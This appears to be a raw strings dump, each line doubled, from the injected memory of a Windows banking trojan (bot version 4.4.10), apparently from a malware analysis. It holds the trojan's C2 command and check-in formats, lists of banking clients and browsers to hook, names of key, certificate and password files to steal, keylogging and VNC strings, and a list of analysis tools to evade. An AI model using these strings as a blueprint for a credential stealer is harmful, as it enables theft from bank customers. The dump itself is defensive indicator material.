passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.bing.com
VVV.microsoft.com
VVV.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
/search.php
/search.php
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\java.exe
\java.exe
\javaw.exe
\javaw.exe
\javaws.exe
\javaws.exe
\opera.exe
\opera.exe
\firefox.exe
\firefox.exe
\maxthon.exe
\maxthon.exe
\avant.exe
\avant.exe
\mnp.exe
\mnp.exe
\safari.exe
\safari.exe
\netscape.exe
\netscape.exe
\tbb-firefox.exe
\tbb-firefox.exe
\frd.exe
\frd.exe
\isclient.exe
\isclient.exe
\ipc_full.exe
\ipc_full.exe
\intpro.exe
\intpro.exe
\cbsmain.dll
\cbsmain.dll
\clmain.exe
\clmain.exe
\core.exe
\core.exe
\rundll32.exe
\rundll32.exe
\notepad.exe
\notepad.exe
\cbank.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.dbf
%s.DBF
%s.DBF
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
client.zip
client.zip
path_client.txt
path_client.txt
path_keys.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
winmm.dll
%s\%s
%s\%s
LibVNCServer 0.9.7
LibVNCServer 0.9.7
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
MSVCRT.dll
MSVCRT.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
ShellExecuteA
ShellExecuteA
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
MapVirtualKeyW
MapVirtualKeyW
SetKeyboardState
SetKeyboardState
EnumChildWindows
EnumChildWindows
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
ADVAPI32.dll
ADVAPI32.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
MSCTF.Shared.MAPPING.%x
Desk_%u%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
MSCTF.Shared.MUTEX.%x
.Prev
.Prev
.current
.current
SYSTEM!XP1!F9BE9A8A
SYSTEM!XP1!F9BE9A8A
MSCTF.Shared.MAPPING.fffffe00
MSCTF.Shared.MAPPING.fffffe00
MSCTF.Shared.MAPPING.ffffff00
MSCTF.Shared.MAPPING.ffffff00
MSCTF.Shared.MAPPING.fffffd00
MSCTF.Shared.MAPPING.fffffd00
MSCTF.Shared.MUTEX.fffffe00
MSCTF.Shared.MUTEX.fffffe00
MSCTF.Shared.MUTEX.ffffff00
MSCTF.Shared.MUTEX.ffffff00
%System%\config\systemprofile\Application Data\
%System%\config\systemprofile\Application Data\
1-191j1w1}1
1-191j1w1}1
?"?(?-?~?
?"?(?-?~?
;-;5;=;^;|;
;-;5;=;^;|;
7"7)7\7~7
7"7)7\7~7
6 6$6(6,6064686
6 6$6(6,6064686
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
svchost.exe_1012_rwx_00B00000_0005B000:
.text
.text
`.data
`.data
.reloc
.reloc
`.rdata
`.rdata
@.data
@.data
http
http
PSShL
PSShL
SSShp
SSShp
tUSSSh
tUSSSh
SSShp;
SSShp;
SSSh0
SSSh0
SSShpk
SSShpk
SSShpF
SSShpF
t9SSSh
t9SSSh
u1SSShP
u1SSShP
name.key
name.key
\secrets.key
\secrets.key
sign.key
sign.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
C:\iDEFENSE
C:\iDEFENSE
\\.\NPF_NdisWanIp
\\.\NPF_NdisWanIp
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\run
\winlogon.exe
\winlogon.exe
sysinfo.log
sysinfo.log
scr.bmp
scr.bmp
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
à %dh %dm
à %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.4.10
4.4.10
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
ntdll.dll
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
Global\HighMemoryEvent_x
explorer.exe
explorer.exe
1.2.5
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.bmp
u.bmp
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.bing.com
VVV.microsoft.com
VVV.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
/search.php
/search.php
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\java.exe
\java.exe
\javaw.exe
\javaw.exe
\javaws.exe
\javaws.exe
\opera.exe
\opera.exe
\firefox.exe
\firefox.exe
\maxthon.exe
\maxthon.exe
\avant.exe
\avant.exe
\mnp.exe
\mnp.exe
\safari.exe
\safari.exe
\netscape.exe
\netscape.exe
\tbb-firefox.exe
\tbb-firefox.exe
\frd.exe
\frd.exe
\isclient.exe
\isclient.exe
\ipc_full.exe
\ipc_full.exe
\intpro.exe
\intpro.exe
\cbsmain.dll
\cbsmain.dll
\clmain.exe
\clmain.exe
\core.exe
\core.exe
\rundll32.exe
\rundll32.exe
\notepad.exe
\notepad.exe
\cbank.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.dbf
%s.DBF
%s.DBF
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
client.zip
client.zip
path_client.txt
path_client.txt
path_keys.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
winmm.dll
%s\%s
%s\%s
LibVNCServer 0.9.7
LibVNCServer 0.9.7
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
MSVCRT.dll
MSVCRT.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
ShellExecuteA
ShellExecuteA
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
MapVirtualKeyW
MapVirtualKeyW
SetKeyboardState
SetKeyboardState
EnumChildWindows
EnumChildWindows
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
ADVAPI32.dll
ADVAPI32.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
MSCTF.Shared.MAPPING.%x
Desk_%u%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
MSCTF.Shared.MUTEX.%x
.Prev
.Prev
.current
.current
1-191j1w1}1
1-191j1w1}1
?"?(?-?~?
?"?(?-?~?
;-;5;=;^;|;
;-;5;=;^;|;
7"7)7\7~7
7"7)7\7~7
6 6$6(6,6064686
6 6$6(6,6064686
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
svchost.exe_1012_rwx_00BA0000_0006A000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
http
http
PSShL
PSShL
SSShp
SSShp
tUSSSh
tUSSSh
SSShp;
SSShp;
SSSh0
SSSh0
SSShpk
SSShpk
SSShpF
SSShpF
t9SSSh
t9SSSh
u1SSShP
u1SSShP
name.key
name.key
\secrets.key
\secrets.key
sign.key
sign.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
C:\iDEFENSE
C:\iDEFENSE
\\.\NPF_NdisWanIp
\\.\NPF_NdisWanIp
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\run
\winlogon.exe
\winlogon.exe
sysinfo.log
sysinfo.log
scr.bmp
scr.bmp
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
à %dh %dm
à %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.4.10
4.4.10
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
ntdll.dll
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
Global\HighMemoryEvent_x
explorer.exe
explorer.exe
1.2.5
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
